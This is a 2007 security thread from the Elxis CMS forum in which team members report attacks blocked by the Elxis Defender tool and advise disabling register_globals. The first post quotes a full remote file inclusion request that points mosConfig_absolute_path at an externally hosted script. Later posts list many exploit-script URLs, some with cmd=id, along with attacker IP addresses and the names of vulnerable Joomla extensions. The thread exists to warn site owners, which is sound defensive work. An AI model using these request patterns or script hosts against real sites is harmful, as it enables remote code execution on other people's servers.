Welcome,
Guest
.
Please
login
or
register
.
Did you miss your
activation email
?
News:
Convert
Wordpress to Elxis
with
Elxis importer
!
Home
Help
Login
Register
Elxis CMS Forum
»
Support
»
Security
»
Detected by Elxis defender exploits
« previous
next »
Print
Pages: [
1
]
2
3
Author
Topic: Detected by Elxis defender exploits (Read 44488 times)
datahell
Elxis Team
Hero Member
Posts: 10356
Detected by Elxis defender exploits
«
on:
September 30, 2007, 12:02:44 »
I saw a dangerous request today at elxis.org logs and I need to tell everyone again the importance of having register globals to off and some php functions disabled.
The request (written in 3 lines):
/index.php?topic=996.0//index.php?
_REQUEST=&_REQUEST%5boption%5d=com_login&_REQUEST%5bItemid%5d=1&
GLOBALS=&mosConfig_absolute_path=http://bsnet.web.id/safe.txt?
Exploit:
http://bsnet.web.id/safe.txt
Functions used:
disk_free_space, shell_exec, exec, system, passthru, popen, getcwd
«
Last Edit: October 04, 2007, 22:52:00 by datahell
»
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
c8620p
Full Member
Posts: 119
ΝΙΨΟΝΑΝΟΜΗΜΑΤΑΜΗΜΟΝΑΝΟΨΙΝ
Re: Dangerous request
«
Reply #1 on:
September 30, 2007, 22:16:39 »
Ok but if we set this option to OFF some of the components may stop working.
Should we be always afraid of something or in new version (2008) something will be more safe?
Logged
On Earth my weight is 70 kgr but on Aries my weight is 27 kgr.
I think I live in wrong planet!
datahell
Elxis Team
Hero Member
Posts: 10356
Re: Dangerous request
«
Reply #2 on:
September 30, 2007, 23:13:32 »
ALL
Elxis standard and Elxis compatible components work perfect with register_globals off. Elxis does not need register_globals to be on. In installation we say that very clear. Elxis 2006.x and 2008.x are safe enough but security is not only a matter of the CMS. It is also a matter of the CMS enviroment. Generally Elxis is very secure.
Elxis 2008.x has some more security enhanchements:
1. Option to hide the administration login page!
2. Elxis defender became more effective.
3. Option to log the login attemps to the administration area (successfull or not).
4. The whole frontend became more "solid" giving less privelledges to users.
5. You can control access settings for any part of the administration area.
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
Ivan Trebješanin
Elxis Team
Hero Member
Posts: 1663
Re: Dangerous request
«
Reply #3 on:
October 01, 2007, 00:47:02 »
Quote from: c8620p on September 30, 2007, 22:16:39
Should we be always afraid ...
YES! It is wise to be cautious all the time, as you can never know what comes next in someone else's mind. And no CMS can be 100% safe, if you leave your dirs or files on 777, or your server is misconfigured, in example. Elxis is the best CMS there ever was regarding security, but hey, there are a lot of pranksters out there, and some of them are smart.
Logged
I've got a snap in my finger...
Got rhythm in my walk...
datahell
Elxis Team
Hero Member
Posts: 10356
Re: Dangerous request
«
Reply #4 on:
October 01, 2007, 07:46:05 »
Unfortunately there is no 100% secure application. Elxis is strong enough but we can not guarantee absolute security. Even elxis.org can theoretically be hacked. For the ones that you may not know it, joomla.org was hacked a month ago. As far as I know it was hacked due a third party component. Elxis core is very secure as we continuously work on it, update and make fixes where needed it. The most security problems are usually from third party applications and insecure site environment. So, please take a look at these, we take care of Elxis.
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
c8620p
Full Member
Posts: 119
ΝΙΨΟΝΑΝΟΜΗΜΑΤΑΜΗΜΟΝΑΝΟΨΙΝ
Re: Dangerous request
«
Reply #5 on:
October 02, 2007, 01:50:45 »
Sorry for the earlier post but I think that I saw somewhere in an installation of a component (for Elxis) that RegisterGlobals MUST be set to ON. Meaby I'm wrong. In the meantime thank you for your answer.
Logged
On Earth my weight is 70 kgr but on Aries my weight is 27 kgr.
I think I live in wrong planet!
datahell
Elxis Team
Hero Member
Posts: 10356
Re: Dangerous request
«
Reply #6 on:
October 03, 2007, 14:39:02 »
A new exploit/attack detected by Elxis Defender.
ATTACKER IP ADDRESS: 81.215.251.202
Country: Turkey (Izmir)
Exploit:
http://animaliitaliani.com/x.dat?list=1&cmd=id
(hosted in Italy)
Also here:
http://georgiaeliteallstars.com/tool20.dat?list=1&cmd=id
(hosted in USA)
DATE: 03-10-2007 01:56:57
Notice
: New Elxis Defender sends you also the requested URI (if you have enabled e-mail notifications).
«
Last Edit: October 05, 2007, 22:23:03 by datahell
»
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
datahell
Elxis Team
Hero Member
Posts: 10356
New exploit detected
«
Reply #7 on:
October 04, 2007, 22:51:24 »
New exploit detected by Elxis defender
ATTACKER IP ADDRESS: 85.25.30.127
ATTACK TYPE: XSS
ATTACKED COMPONENT: Elxis Core
COUNTRY: Germany
EXPLOIT:
http://pastebin.ca/raw/725499?
(hosted in Canada)
DATE: 04-10-2007 22:08:01
Notice: If you wish to have now the new version of Elxis Defender (available in Elxis 2008.x) send me a PM to send you the new version.
I will ONLY accept requests from:
- Elxis Team members
- Elxis community members
- People having support contracts with GO UP Inc
- GO UP Inc's affiliates and partners.
«
Last Edit: October 05, 2007, 22:15:59 by datahell
»
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
datahell
Elxis Team
Hero Member
Posts: 10356
Re: Detected by Elxis defender exploits
«
Reply #8 on:
October 05, 2007, 14:59:40 »
ATTACKER IP ADDRESS: 217.65.240.14
Country: Ukraine (LVIVSKA OBLAST)
Exploit:
http://usuarios.arnet.com.ar/larry123/safe.txt?
(hosted in Argentina)
DATE: 05-10-2007 07:22:09
«
Last Edit: October 05, 2007, 22:24:12 by datahell
»
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
datahell
Elxis Team
Hero Member
Posts: 10356
Re: Detected by Elxis defender exploits
«
Reply #9 on:
October 05, 2007, 18:48:55 »
ATTACKER IP ADDRESS: 207.150.191.62
Country: United States (California, Dixon)
Exploit:
http://www.brandy-rose.com/members/id.txt?
(hosted in USA)
DATE: 05-10-2007 18:11:05
«
Last Edit: October 05, 2007, 22:25:53 by datahell
»
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
datahell
Elxis Team
Hero Member
Posts: 10356
Re: Detected by Elxis defender exploits
«
Reply #10 on:
October 05, 2007, 21:58:58 »
ATTACKER IP ADDRESS: 209.59.205.211
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_mmsblog (joomla)
COUNTRY: United States (Washington, Bellevue)
EXPLOIT:
http://www.kadastra.com/de/ec.txt?
(hosted in Bulgaria)
DATE: 05-10-2007 21:19:15
«
Last Edit: October 05, 2007, 22:25:03 by datahell
»
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
datahell
Elxis Team
Hero Member
Posts: 10356
Re: Detected by Elxis defender exploits
«
Reply #11 on:
October 05, 2007, 22:21:31 »
ATTACKER IP ADDRESS: 74.86.55.194
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_serverstat (joomla)
COUNTRY: USA (Illinois, Chicago)
EXPLOIT:
http://www.brandy-rose.com/members/id.txt?
(hosted in USA)
DATE: 05-10-2007 22:04:48
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
datahell
Elxis Team
Hero Member
Posts: 10356
Re: Detected by Elxis defender exploits
«
Reply #12 on:
October 06, 2007, 09:12:35 »
ATTACKER IP ADDRESS: 67.18.228.34
ATTACK TYPE: XSS
ATTACKED COMPONENT: com_mtree
COUNTRY: USA (Texas, Dallas)
EXPLOIT:
http://tric.or.id/id.txt?
(hosted in Indonesia)
DATE: 06-10-2007 02:10:04
ATTACKER IP ADDRESS: 81.214.175.110
ATTACK TYPE: XSS
ATTACKED COMPONENT: Elxis Core
COUNTRY: Turkey (Izmir)
EXPLOIT:
http://animaliitaliani.com/x.dat?list=1&cmd=id
(hosted in Italy)
DATE: 06-10-2007 07:22:54
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
datahell
Elxis Team
Hero Member
Posts: 10356
Re: Detected by Elxis defender exploits
«
Reply #13 on:
October 17, 2007, 14:45:54 »
From the kind of attacks Elxis defender blocks daily we see software that is possibly vunerable.
So, here are 3 joomla extensions with security problems:
module
astatspro_show_2
bot
multithumb
component
ricettario
(vunerable in backend too! )
We also have many attacks on component mtree and specially on the savant files (there is an elxis version available)
Having register_globals off, allow_url_fopen off or set mosConfig as a filter at Elxis defender (version 2008) makes these attacks useless.
New exploits:
http://futurehousingsystems.com/images/control.txt
http://www.dunakom.hu/userimages/id.txt
http://www.cityvoice.biz/shop/pub/_vti/safe.txt
http://www.canalhip-hop.kit.net/id.txt
ftp://132.203.200.248
( /nod32/new )
«
Last Edit: October 17, 2007, 18:36:22 by datahell
»
Logged
Elxis Team
|
Is Open Source
|
IOS Rentals | IOS AERO
nikos65
Hero Member
Posts: 1043
Re: Detected by Elxis defender exploits
«
Reply #14 on:
October 21, 2007, 08:59:52 »
Continuous attacks at www[dot]hotel-astoria[dot]gr today
# IP Date Filters
1 66.135.32.79 [GEO 1] [GEO 2] Sunday, 21 October 2007 07:38:18 mosConfig_
2 216.22.3.3 [GEO 1] [GEO 2] Sunday, 21 October 2007 07:42:04 mosConfig_
3 211.202.2.55 [GEO 1] [GEO 2] Sunday, 21 October 2007 08:08:58 mosConfig_
Two from usa and one from korea .
Logged
----
Γηράσκω αεί διδασκόμενος
www.dallas.gr
|
www.igoumenitsahotels.com
Print
Pages: [
1
]
2
3
« previous
next »
Elxis CMS Forum
»
Support
»
Security
»
Detected by Elxis defender exploits